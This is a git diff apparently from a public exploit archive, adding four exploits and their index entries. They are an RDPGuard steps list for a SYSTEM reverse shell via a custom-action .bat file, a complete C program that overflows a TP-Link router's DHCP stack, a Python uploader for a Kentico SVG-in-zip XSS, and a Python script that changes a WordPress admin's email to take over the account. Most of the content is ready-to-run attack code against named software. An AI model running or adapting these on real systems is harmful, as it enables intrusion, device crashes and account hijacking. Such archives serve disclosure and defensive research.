diff --git a/exploits/multiple/local/52289.txt b/exploits/multiple/local/52289.txt new file mode 100644 index 000000000..3223f7121 --- /dev/null +++ b/exploits/multiple/local/52289.txt @@ -0,0 +1,20 @@ +# Exploit Title: RDPGuard 9.9.9 - Privilege Escalation +# Discovered by: Ahmet Ümit BAYRAM +# Discovered Date: 09.05.2025 +# Vendor Homepage: https://rdpguard.com +# Software Link: https://rdpguard.com/download.aspx +# Tested Version: 9.9.9 (latest) +# Tested on: Windows 10 (32bit) + +# # # Steps to Reproduce # # # + +# 1. Prepare a .bat file containing your reverse shell code. +# 2. Open RDPGuard. +# 3. Navigate to Tools > Custom Actions / Notifications. +# 4. Click the "Add" button. +# 5. Leave "Event" as "IP Blocked". +# 6. Select "Execute Program" from the "Action" dropdown. +# 7. Under the "Program/script" field, select your prepared .bat file. +# 8. Set up your listener. +# 9. Click "Test Run". +# 10. A reverse shell as NT AUTHORITY\SYSTEM is obtained! \ No newline at end of file diff --git a/exploits/multiple/local/52292.c b/exploits/multiple/local/52292.c new file mode 100644 index 000000000..9bd0139c1 --- /dev/null +++ b/exploits/multiple/local/52292.c @@ -0,0 +1,338 @@ +/* + * Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow + * Date: 10/20/2024 + * Exploit Author: Mohamed Maatallah + * Vendor Homepage: https://www.tp-link.com + * Version: TT_V6.2.1021 (VN020-F3v(T)) + * Tested on: VN020-F3v(T) Router (Hardware Version 1.0) + * CVE: CVE-2024-11237 + * Category: Remote + + * Technical Details: + * ----------------- + * - Triggers multiple memory corruption vectors in DHCP parsing + * - Primary vector: Stack overflow via oversized hostname (127 bytes) + * - Secondary vector: Parser confusion via malformed length fields + * - Tertiary vector: Vendor specific option parsing edge case + * + * Attack Surface: + * -------------- + * - DHCP service running on port 67 + * - Processes broadcast DISCOVER packets + * - No authentication required + * - Affects all routers running VN020 F3v(t) specifically the ones + * supplied by Tunisie Telecom & Topnet + * + * Exploitation Method: + * ------------------ + * 1. Sends crafted DHCP DISCOVER packet + * 2. Overflows hostname buffer (64 -> 127 bytes) + * 3. Corrupts length fields in DHCP options + * 4. Success = No response (service crash) + * + * Build: + * ------ + * Windows: cl poc.c /o tplink_dhcp.exe or use visual studio directly. + * + * Usage: + * ------ + * tplink_dhcp.exe + +#define _WINSOCK_DEPRECATED_NO_WARNINGS +#include +#include +#include +#include +#include +#include + +#pragma comment(lib, "ws2_32.lib") + +// Standard DHCP ports - Server listens on 67, clients send from 68 +#define DHCP_SERVER_PORT 67 +#define DHCP_CLIENT_PORT 68 +#define MAX_PACKET_SIZE 1024 // Maximum size for DHCP packet +#define MAX_ATTEMPTS 3 + +// Forward declarations of functions +void create_dhcp_discover_packet(unsigned char* packet, int* packet_length); +void add_option(unsigned char* packet, int* offset, unsigned char option, + unsigned char length, unsigned char* data); +void tp_link(unsigned char* packet, int* offset); +void print_packet_hex(unsigned char* packet, int length); +int wait_for_response(SOCKET sock, int timeout); + +int main() { + WSADATA wsa; + SOCKET sock; + struct sockaddr_in dest; + unsigned char packet[MAX_PACKET_SIZE]; // Buffer for DHCP packet + int packet_length = 0; // Length of constructed packet + int attempts = 0; // Counter for send attempts + int success = 0; + + + printf("[TP-Thumper] Initializing Winsock...\n"); + if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) { + printf("[TP-Thumper] Winsock initialization failed. Error: %d\n", + WSAGetLastError()); + return 1; + } + + sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); + if (sock == INVALID_SOCKET) { + printf("[TP-Thumper] Could not create socket. Error: %d\n", + WSAGetLastError()); + WSACleanup(); + return 1; + } + + // Set up broadcast address (255.255.255.255) + dest.sin_family = AF_INET; + dest.sin_port = htons(DHCP_SERVER_PORT); + dest.sin_addr.s_addr = inet_addr("255.255.255.255"); + + // Enable broadcast mode on socket + BOOL broadcast = TRUE; + if (setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char*)&broadcast, + sizeof(broadcast)) < 0) { + printf("[TP-Thumper] Broadcast mode failed.\n"); + closesocket(sock); + WSACleanup(); + return 1; + } + + srand((unsigned int)time(NULL)); + + // Create the DHCP DISCOVER packet + create_dhcp_discover_packet(packet, &packet_length); + + // Main attempt loop - tries to send packet MAX_ATTEMPTS times + while (attempts < MAX_ATTEMPTS && !success) { + printf("[TP-Thumper] Sending DHCP Discover packet (Attempt %d/%d)...\n", + attempts + 1, MAX_ATTEMPTS); + print_packet_hex(packet, packet_length); //debug + + // Send the packet + if (sendto(sock, (char*)packet, packet_length, 0, (struct sockaddr*)&dest, + sizeof(dest)) < 0) { + printf("[TP-Thumper] Packet send failed. Error: %d\n", WSAGetLastError()); + } + else { + printf("[TP-Thumper] Packet sent. Waiting for router response...\n"); + if (wait_for_response(sock, 10)) { + printf( + "[TP-Thumper] Router responded! Exploit may not have succeeded.\n"); + success = 1; + } + else { + printf("[TP-Thumper] No response received within timeout.\n"); + } + } + attempts++; + } + if (!success) { + printf( + "[TP-Thumper] Exploit succeeded: No router response after %d " + "attempts.\n", + MAX_ATTEMPTS); + } + else { + printf("[TP-Thumper] Exploit failed: Router responded within timeout.\n"); + } + + // Cleanup + closesocket(sock); + WSACleanup(); + return 0; +} +/* + * DHCP Message Format: + * [0x00]: op = 0x01 ; BOOTREQUEST + * [0x01]: htype = 0x01 ; Ethernet + * [0x02]: hlen = 0x06 ; MAC addr len + * [0x03]: hops = 0x00 ; No relay + * [0x04-0x07]: xid ; Random transaction ID + * [0x08-0x0F]: secs + flags ; Broadcast flags set + * [0x10-0x1F]: ciaddr + yiaddr ; Empty + * [0x20-0x27]: siaddr + giaddr ; Empty + * [0x28-0x2D]: chaddr ; Crafted MAC + */ + +void create_dhcp_discover_packet(unsigned char* packet, int* packet_length) { + memset(packet, 0, MAX_PACKET_SIZE); + int offset = 0; + + // DHCP Header - Standard fields + packet[offset++] = 0x01; // BOOTREQUEST + packet[offset++] = 0x01; // Ethernet + packet[offset++] = 0x06; // MAC len + packet[offset++] = 0x00; // No hops + + // ; XID - rand() used for bypass of response filtering + // ; mov eax, rand() + // ; mov [packet + 4], eax + unsigned int xid = (unsigned int)rand(); + *((unsigned int*)&packet[offset]) = htonl(xid); + offset += 4; + + // ; Flags - Set broadcast bit to force response + // ; mov word [packet + 8], 0x0000 ; secs elapsed + // ; mov word [packet + 10], 0x8000 ; broadcast flag + packet[offset++] = 0x00; + packet[offset++] = 0x00; + packet[offset++] = 0x80; + packet[offset++] = 0x00; + + // Zero IP fields - forces DHCP server parse + memset(&packet[offset], 0, 16); + offset += 16; + + // ; Crafted MAC - DE:AD:BE:EF:00:01 + // ; Used for unique client tracking, bypasses MAC filters + packet[offset++] = 0xDE; + packet[offset++] = 0xAD; + packet[offset++] = 0xBE; + packet[offset++] = 0xEF; + packet[offset++] = 0x00; + packet[offset++] = 0x01; + memset(&packet[offset], 0x00, 10); + offset += 10; + + // ; Skip server name/boot filename + // ; Total padding: 192 bytes + memset(&packet[offset], 0x00, 64); + offset += 64; + memset(&packet[offset], 0x00, 128); + offset += 128; + + // ; DHCP Magic Cookie + // ; 0x63825363 = DHCP in natural order + packet[offset++] = 0x63; + packet[offset++] = 0x82; + packet[offset++] = 0x53; + packet[offset++] = 0x63; + + // ; Stack layout after this point: + // ; [ebp+0] = DHCP header + // ; [ebp+240] = DHCP options start + // ; Router parses sequentially from this point + add_option(packet, &offset, 0x35, 0x01, (unsigned char[]) { 0x01 }); + add_option(packet, &offset, 0x37, 4, + (unsigned char[]) { + 0x01, 0x03, 0x06, 0x0F + }); + + // ; Trigger overflow conditions + tp_link(packet, &offset); + + packet[offset++] = 0xFF; // End option + *packet_length = offset; +} + +void tp_link(unsigned char* packet, int* offset) { + // ; Vendor specific overflow - triggers parser state confusion + // ; 0x00,0x14,0x22 = TP-Link vendor prefix + // ; Following 0xFF bytes cause length validation bypass + unsigned char vendor_specific[] = { 0x00, 0x14, 0x22, 0xFF, 0xFF, 0xFF }; + add_option(packet, offset, 0x2B, sizeof(vendor_specific), vendor_specific); + + // ; Stack buffer overflow via hostname + // ; Router allocates 64-byte buffer but we send 127 + // ; Overwrites adjacent stack frame + unsigned char long_hostname[128]; + memset(long_hostname, 'A', sizeof(long_hostname) - 1); + long_hostname[127] = '\0'; + add_option(packet, offset, 0x0C, 127, long_hostname); + + // ; Length field exploit + // ; Claims 255 bytes but only sends 1 + // ; Router assumes full length during memory operations + // ; leads to read/write past buffer + add_option(packet, offset, 0x3D, 0xFF, (unsigned char[]) { 0x01 }); +} + +// ; Helper for DHCP option construction +// ; option = option code +// ; length = claimed length (can be falsified) +// ; data = actual payload + +void add_option(unsigned char* packet, int* offset, unsigned char option, + unsigned char length, unsigned char* data) { + packet[(*offset)++] = option; // Option type + packet[(*offset)++] = length; // Claimed length + memcpy(&packet[*offset], data, length); + *offset += length; +} + +// Debug +void print_packet_hex(unsigned char* packet, int length) { + printf("[TP-Thumper] Packet Hex Dump:\n"); + + // Print header fields with labels + printf("Opcode (op): %02X\n", packet[0]); + printf("Hardware Type (htype): %02X\n", packet[1]); + printf("Hardware Address Length (hlen): %02X\n", packet[2]); + printf("Hops: %02X\n", packet[3]); + + // Transaction ID + printf("Transaction ID (xid): "); + for (int i = 4; i < 8; i++) { + printf("%02X ", packet[i]); + } + printf("\n"); + + // Flags + printf("Flags: "); + for (int i = 10; i < 12; i++) { + printf("%02X ", packet[i]); + } + printf("\n"); + + // Client Hardware Address (MAC) + printf("Client Hardware Address (chaddr): "); + for (int i = 28; i < 34; i++) { + printf("%02X ", packet[i]); + } + printf("\n"); + + // DHCP Magic Cookie + printf("Magic Cookie: "); + for (int i = 236; i < 240; i++) { + printf("%02X ", packet[i]); + } + printf("\n"); + + // DHCP Options + printf("DHCP Options:\n"); + int i = 240; + while (i < length) { + printf(" Option: %02X, Length: %02X, Data: ", packet[i], packet[i + 1]); + int option_length = packet[i + 1]; + for (int j = 0; j < option_length; j++) { + printf("%02X ", packet[i + 2 + j]); + } + printf("\n"); + i += 2 + option_length; + if (packet[i] == 0xFF) { + printf(" End of Options\n"); + break; + } + } +} + +// Wait for router response with timeout +int wait_for_response(SOCKET sock, int timeout) { + struct timeval tv; + tv.tv_sec = timeout; + tv.tv_usec = 0; + + // Set up file descriptor set for select() + fd_set readfds; + FD_ZERO(&readfds); + FD_SET(sock, &readfds); + + // Wait for data or timeout + int result = select(0, &readfds, NULL, NULL, &tv); + return result > 0; // Returns true if data available +} \ No newline at end of file diff --git a/exploits/multiple/webapps/52290.py b/exploits/multiple/webapps/52290.py new file mode 100755 index 000000000..81fea1eb5 --- /dev/null +++ b/exploits/multiple/webapps/52290.py @@ -0,0 +1,68 @@ +# Exploit Title: Kentico Xperience 13.0.178 - Cross Site Scripting (XSS) +# Date: 2025-05-09 +# Version: Kentico Xperience before 13.0.178 +# Exploit Author: Alex Messham +# Contact: ramessham@gmail.com +# Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178---XSS-POC/ +# CVE: CVE-2025-32370 + +import requests +import subprocess +import os +import argparse + +def create_svg_payload(svg_filename: str): + print(f"[*] Writing malicious SVG to: {svg_filename}") + svg_payload = ''' + + + + + +''' + with open(svg_filename, 'w') as f: + f.write(svg_payload) + +def zip_payload(svg_filename: str, zip_filename: str): + print(f"[*] Creating zip archive: {zip_filename}") + subprocess.run(['zip', zip_filename, svg_filename], check=True) + +def upload_zip(zip_filename: str, target_url: str): + full_url = f"{target_url}?Filename={zip_filename}&Complete=false" + headers = { + "Content-Type": "application/octet-stream" + } + + print(f"[+] Uploading {zip_filename} to {full_url}") + with open(zip_filename, 'rb') as f: + response = requests.post(full_url, headers=headers, data=f, +verify=False) + + if response.status_code == 200: + print("[+] Upload succeeded") + else: + print(f"[-] Upload failed with status code {response.status_code}") + print(response.text) + + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="PoC for CVE-2025-2748 - +Unauthenticated ZIP file upload with embedded SVG for XSS.") + parser.add_argument("--url", required=True, help="Target upload URL +(e.g. https://example.com/CMSModules/.../MultiFileUploader.ashx)") + parser.add_argument("--svg", default="poc.svc", help="SVG filename to +embed inside the zip") + parser.add_argument("--zip", default="exploit.zip", help="Name of the +output zip file") + + args = parser.parse_args() + + create_svg_payload(args.svg) + zip_payload(args.svg, args.zip) + upload_zip(args.zip, args.url) +``` \ No newline at end of file diff --git a/exploits/multiple/webapps/52291.py b/exploits/multiple/webapps/52291.py new file mode 100755 index 000000000..8d9408c5c --- /dev/null +++ b/exploits/multiple/webapps/52291.py @@ -0,0 +1,71 @@ +# Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation +# Google Dork: inurl:/wp-content/plugins/frontend-login-and-registration-blocks/ +# Date: 2025-05-12 +# Exploit Author: Md Shoriful Islam (RootHarpy) +# Vendor Homepage: https://wordpress.org/plugins/frontend-login-and-registration-blocks/ +# Software Link: https://downloads.wordpress.org/plugin/frontend-login-and-registration-blocks.1.0.7.zip +# Version: <= 1.0.7 +# Tested on: Ubuntu 22.04 + WordPress 6.5.2 +# CVE : CVE-2025-3605 + +import requests +import argparse +import sys + +def display_banner(): + banner = """ + _____ _____ ___ __ ___ ___ ____ __ __ ___ + / __\ \ / / __|_|_ ) \_ ) __|__|__ / / / / \| __| +| (__ \ V /| _|___/ / () / /|__ \___|_ \/ _ \ () |__ \ + \___| \_/ |___| /___\__/___|___/ |___/\___/\__/|___/ + """ + print(banner) + +def suppress_ssl_warnings(): + requests.packages.urllib3.disable_warnings() + +def initialize_session(): + new_session = requests.Session() + new_session.verify = False + new_session.headers.update({'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"}) + return new_session + +def parse_input_args(): + parser = argparse.ArgumentParser(description="Exploit for Privilege Escalation in Frontend Login and Registration Plugin <= 1.0.7") + parser.add_argument("--target", "-t", required=True, help="Target URL to exploit") + parser.add_argument("--target_user", "-u", default="1", help="User ID for target (default: 1)") + parser.add_argument("--new_email", "-e", default="example@gmail.com", help="Email to change to (default: example@gmail.com)") + return parser.parse_args() + +def generate_payload(user, email): + return { + 'action': 'flrblocksusersettingsupdatehandle', + 'user_id': user, + 'flr-blocks-email-update': email + } + +def execute_exploit(session, target_url, payload): + try: + return session.post(f"{target_url}/wp-admin/admin-ajax.php", data=payload) + except Exception as error: + print(f"Request error: {error}") + sys.exit(1) + +def process_response(response): + if response.status_code == 200 and response.text.strip() != "0": + print(f"Exploit succeeded! Response: {response.text}") + print("Next: Go to the Forgot Password page and reset the admin password using the new email!") + else: + print(f"Exploit failed. HTTP Status: {response.status_code}, Response: {response.text}") + +def run_exploit(): + display_banner() + suppress_ssl_warnings() + args = parse_input_args() + session = initialize_session() + payload = generate_payload(args.target_user, args.new_email) + response = execute_exploit(session, args.target, payload) + process_response(response) + +if __name__ == "__main__": + run_exploit() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 845f80054..8b57329d3 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10568,6 +10568,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51983,exploits/multiple/local/51983.txt,"PrusaSlicer 2.6.1 - Arbitrary code execution",2024-04-12,"Kamil Breński",local,multiple,,2024-04-12,2024-04-12,0,,,,,, 43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2016-0772,,,,,https://github.com/tintinweb/pub/tree/11f6ebda59ad878377df78351f8ab580660d0024/pocs/cve-2016-0772 52190,exploits/multiple/local/52190.py,"qBittorrent 5.0.1 - MITM RCE",2025-04-11,"Jordan Sharp",local,multiple,,2025-04-11,2025-04-11,0,CVE-2024-51774,,,,, +52289,exploits/multiple/local/52289.txt,"RDPGuard 9.9.9 - Privilege Escalation",2025-05-13,"Ahmet Ümit BAYRAM",local,multiple,,2025-05-13,2025-05-13,0,CVE-n/a,,,,, 21078,exploits/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 - Weak Password Encryption",2001-08-23,"Desmond Irvine",local,multiple,,2001-08-23,2012-09-05,1,CVE-2001-1003;OSVDB-11802,,,,,https://www.securityfocus.com/bid/3228/info 47172,exploits/multiple/local/47172.sh,"S-nail < 14.8.16 - Local Privilege Escalation",2019-01-13,bcoles,local,multiple,,2019-07-26,2019-07-26,0,CVE-2017-5899,,,,,https://github.com/bcoles/local-exploits/blob/3c5cd80a7c59ccd29a2c2a1cdbf71e0de8e66c11/CVE-2017-5899/exploit.sh 49108,exploits/multiple/local/49108.txt,"SAP Lumira 1.31 - Stored Cross-Site Scripting",2020-11-27,"Ilca Lucian Florin",local,multiple,,2020-11-27,2020-11-27,0,,,,,, @@ -10585,6 +10586,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 22732,exploits/multiple/local/22732.java,"Sun JRE/SDK 1.x - Untrusted Applet Java Security Model Violation",2003-06-05,"Marc Schoenefeld",local,multiple,,2003-06-05,2012-11-15,1,CVE-2003-1123;OSVDB-15151,,,,,https://www.securityfocus.com/bid/7824/info 9973,exploits/multiple/local/9973.sh,"Sun VirtualBox 3.0.6 - Local Privilege Escalation",2009-10-17,prdelka,local,multiple,,2009-10-16,,1,CVE-2009-3692,,,,, 49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple,,2020-12-09,2020-12-09,0,,,,,, +52292,exploits/multiple/local/52292.c,"TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow",2025-05-13,"Mohamed Maatallah",local,multiple,,2025-05-13,2025-05-13,0,CVE-2024-11237,,,,, 19551,exploits/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)",1997-02-13,"Last Stage of Delirium",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info 19552,exploits/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info 11789,exploits/multiple/local/11789.c,"VariCAD 2010-2.05 EN - Local Buffer Overflow",2010-03-17,n00b,local,multiple,,2010-03-16,,1,OSVDB-63067,,,,, @@ -12090,6 +12092,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 24573,exploits/multiple/webapps/24573.txt,"Keene Digital Media Server 1.0.2 - Cross-Site Scripting",2004-09-04,dr_insane,webapps,multiple,,2004-09-04,2013-03-04,1,,,,,,https://www.securityfocus.com/bid/11111/info 36609,exploits/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",webapps,multiple,80,2015-04-02,2015-04-02,0,CVE-2014-7910;CVE-2014-7227;CVE-2014-7196;CVE-2014-7169;CVE-2014-62771;CVE-2014-6271;CVE-2014-5288;CVE-2014-5287;CVE-2014-3671;OSVDB-120255;CVE-2014-3659;OSVDB-120254;OSVDB-120253;OSVDB-120252;OSVDB-120251;OSVDB-120250;OSVDB-120249;OSVDB-112004,,,,, 42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,webapps,multiple,,2017-05-30,2017-05-30,0,,,,,, +52290,exploits/multiple/webapps/52290.py,"Kentico Xperience 13.0.178 - Cross Site Scripting (XSS)",2025-05-13,"Alex Messham",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-32370,,,,, 14629,exploits/multiple/webapps/14629.html,"Kleeja Upload - Cross-Site Request Forgery (Change Admin Password)",2010-08-12,"KOLTN S",webapps,multiple,80,2010-08-12,2010-09-08,0,OSVDB-67094,,,,, 44487,exploits/multiple/webapps/44487.txt,"Kodi 17.6 - Persistent Cross-Site Scripting",2018-04-18,"Manuel García Cárdenas",webapps,multiple,,2018-04-18,2018-04-18,0,CVE-2018-8831,"Cross-Site Scripting (XSS)",,,, 50521,exploits/multiple/webapps/50521.py,"KONGA 0.14.9 - Privilege Escalation",2021-11-15,"Fabricio Salomao",webapps,multiple,,2021-11-15,2021-11-15,0,,,,,http://www.exploit-db.comkonga-0.14.9.zip, @@ -12494,6 +12497,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,, 47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/ 52285,exploits/multiple/webapps/52285.py,"WordPress Depicter Plugin 3.6.1 - SQL Injection",2025-05-09,"Andrew Long",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-2011,,,,,https://github.com/datagoboom/CVE-2025-2011 +52291,exploits/multiple/webapps/52291.py,"WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation",2025-05-13,"Md Shoriful Islam",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-3605,,,,, 49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,, 48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,, 36930,exploits/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - SQL Injection",2015-05-07,"Felipe Molina",webapps,multiple,,2015-05-07,2015-05-07,0,OSVDB-121843,"WordPress Plugin",,,http://www.exploit-db.comfreshmail-newsletter.1.5.8.zip,